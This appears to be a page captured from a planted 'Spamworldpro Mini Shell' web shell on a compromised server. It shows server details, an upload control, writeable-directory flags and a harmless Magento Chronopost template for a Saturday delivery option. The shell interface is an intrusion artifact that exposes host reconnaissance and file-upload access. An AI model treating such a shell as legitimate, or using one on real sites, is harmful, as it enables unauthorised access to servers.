Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/app/code/Chronopost/Chronorelais/view/frontend/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/app/code/Chronopost/Chronorelais/view/frontend/templates/saturday_option.phtml
<?php
/** @var Template $block */

use Magento\Framework\View\Element\Template;

$amountToDisplay = $block->getSaturdayAmount() ?
    sprintf('+%s%s', $block->getSaturdayAmount(), $block->getCurrencySymbol()) : __('Free');
?>

<tr id="saturday_container_<?= /** @noEscape */ $block->getMethodCode() ?>" class="saturday_container">
    <td colspan="4">
        <div>
            <input id="saturday_delivery" type="checkbox" name="saturday_delivery"/>
            <label for="saturday_delivery"><?= /** @noEscape */ __('Add the Saturday delivery option: (%1)', $amountToDisplay) ?></label>
        </div>
    </td>
</tr>

Spamworldpro Mini